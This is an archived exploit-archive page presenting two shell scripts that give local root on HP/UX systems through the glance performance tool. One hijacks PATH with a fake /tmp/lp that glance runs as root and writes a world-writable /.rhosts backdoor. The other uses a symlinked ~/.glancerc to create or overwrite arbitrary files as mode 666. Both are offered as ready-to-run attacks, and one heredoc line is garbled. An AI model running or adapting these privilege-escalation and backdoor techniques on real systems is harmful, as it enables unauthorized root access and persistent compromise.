More HP/UX glance vulnerabilities
| Description: | A couple more old glance vulnerabilities |
| Author: | Colonel Panic of SOD (sod@command.com.inter.net) |
| Compromise: | root (local) |
| Vulnerable Systems: | HP/UX with vulnerable glance, maybe 9.x or 10.x |
| Date: | Unknown |
| Notes: | See the SOD HP Bug of the Week page |
Exploit:
--exploit 1: glance-lp
#!/bin/ksh
# the other .traz
GLANCE=/usr/perf/bin/glance
# Put any commands you want into /tmp/lp, and they'll be run as root, basically
cat > /tmp/lp <> /.rhosts
chmod 666 /.rhosts
EOF
echo "Please wait about 10 or 15 seconds for your commands to run"
chmod 777 /tmp/lp
PATH=/tmp:$PATH
export PATH
${GLANCE} -j 1 -p bob -iterations 1 -maxpages 1 > /dev/null 2>&1
rm /tmp/lp
--exploit 2: glance-rc
#!/bin/ksh
# the one .traz
FILE=$1
PROGGIE=`basename $0`
GLANCE=/usr/perf/bin/glance
if [ -z "$1" ]
then
echo "usage: $PROGGIE file_to_create_or_overwrite"
exit
fi
if [ -f ~/.glancerc ]
then
mv ~/.glancerc ~/.glancerc.old
fi
umask 0
ln -s $FILE ~/.glancerc
if [ -f $FILE ]
then
echo "File exists -- will be overwritten with garbage"
else
echo "File doesn't exist -- will be created mode 666"
CREATE_666="yes"
fi
echo "Please wait about 10 seconds or so"
${GLANCE} -j 1 -iterations 1 > /dev/null 2>&1
if [ -n "${CREATE_666}" ]
then
>$FILE
fi
rm ~/.glancerc
if [ -f ~/.glancerc.old ]
then
mv ~/.glancerc.old ~/.glancerc
fi
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
